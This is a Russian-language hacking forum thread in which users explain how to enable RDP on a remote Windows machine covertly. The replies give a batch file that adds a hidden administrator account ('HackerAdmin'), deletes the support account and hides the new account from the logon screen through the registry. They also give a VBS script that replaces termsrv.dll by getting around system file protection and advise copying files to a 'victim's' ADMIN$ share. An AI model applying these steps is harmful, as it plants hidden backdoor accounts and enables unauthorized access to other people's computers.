Включение rdp

Discussion in 'Песочница' started by OPF_Nik, 23 Jan 2010.

  1. OPF_Nik

    OPF_Nik New Member

    Joined:
    6 Nov 2009
    Messages:
    36
    Likes Received:
    3
    Reputations:
    -5
    Народ, вот у меня такая проблема:
    Прописал параметр в реестр, что бы включить возможность подключения через rdp, но при входе, пишет, мол одна учетная запись уже работает
    Как можно это изменить, и желательно без палевно?
     
  2. Monsieur

    Monsieur New Member

    Joined:
    17 Jan 2010
    Messages:
    11
    Likes Received:
    2
    Reputations:
    0
    Хм,насчет беспалевности затрудняюсь ответить. Возможен такой вариант(я так через телнет иногда подключаюсь). Сразу скажу,что это самый палевный вариант из все возможных :)
    Пишешь батник:
    Code:
    chcp 1251
    net user SUPPORT_388945a0 /delete
    net user HackerAdmin mygoodpassword /add
    net localgroup Администраторы hacker /add
    net localgroup Пользователи SUPPORT_388945a0 /del
    regedit /s conf.reg
    
    (SUPPORT_388945a0 для xp prof и 2003сервер)
    т.е. добавляешь нового пользователя с админскими правами и удаляешь первоначального.

    Но т.к. при создании нового администратора, он будет виден в Вэлком Скрине, отключить его
    можно импортировав
    рег файл в реестр, следующего содержания:
    Содержимое conf.reg
    Code:
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 
    NTCurrentVersionWinlogonSpecialAccountsUserLis t]
    "HackerAdmin"=dword:00000000
    
    Безусловно,это не весь батник,а лишь его основа.
     
  3. OPF_Nik

    OPF_Nik New Member

    Joined:
    6 Nov 2009
    Messages:
    36
    Likes Received:
    3
    Reputations:
    -5
    это я и так знаю)) но спасибо за помощ
     
  4. TheBloodTear

    TheBloodTear New Member

    Joined:
    22 Jan 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    У тебя есть возможность подойти к ПК локально?:)..

    Если есть, и на нем установлена OC Windows XP, то делай так, ну а потом извращайся:).. Если честно, то не пробовал такой способ сам..
    Я заменял библиотеку termsrv на самую раннюю, она еще с беты(если не ошибаюсь)..
    Если этот способ не поможет, то отпишись, опишу другой:)..
     
  5. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    хм. ну напиши другой.
     
  6. TheBloodTear

    TheBloodTear New Member

    Joined:
    22 Jan 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Для этого сначала надо будет скачать вот эту библиотеку..

    Потом проделать это:
    1) Создай такие ключи:

    "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConcurrentSessions", "00000001", "REG_DWORD"

    "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services\MaxInstanceCount", "00000003", "REG_DWORD"

    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions", "00000001", "REG_DWORD"

    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LogonType", "00000001", "REG_DWORD"

    2) Замени системную библиотеку на скачанную (только замена руками очень затруднительна, т.к. система хорошо следит за целостностью, я использую vbs-скрипты или подобное):

    system_folder = "c:\windows\system32\"
    system_cache = "c:\windows\system32\dllcache\"
    new_dll = "termsrv.dll"
    cache_dll = "C:\windows\system32\dllcache\termsrv.dll"
    old_dll = "C:\windows\system32\termsrv.dll"
    old_name = "termsrv_old.dll"

    fso.MoveFile cache_dll, system_cache & old_name
    fso.CopyFile new_dll, system_cache, true
    fso.MoveFile old_dll, system_folder & old_name
    fso.CopyFile new_dll, system_folder, true

    3) Система ругнется на то, что целостность улетела в аут, и предложит восстановить все, жмите не надо, перезагрузитесь, и пробуйте:)..

    Отпишитесь, заработает или нет.. Если нет, попробую сделать exe-шник для всех этих махинаций:)..
     
    #6 TheBloodTear, 3 Feb 2010
    Last edited: 3 Feb 2010
  7. OPF_Nik

    OPF_Nik New Member

    Joined:
    6 Nov 2009
    Messages:
    36
    Likes Received:
    3
    Reputations:
    -5
    TheBloodTear надо будет попробывать, спс
    Но вообще, доступ удаленый
     
  8. TheBloodTear

    TheBloodTear New Member

    Joined:
    22 Jan 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ну как я понимаю пасс админа ты знаешь, так что копируй по этому пути:
    \\жертва\ADMIN$ :)..

    Единственная проблема это защитник системный файлов, он ругнется в консольный сеанс, но я думаю потом выложу чтонить против него:)..

    Ну а если RDP по инету, то просто разок подчикирь человека и выбей, а потом глумись:)..
     
  9. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Придется заменить родную termsrv.dll или пропатчить её. Почитай вот это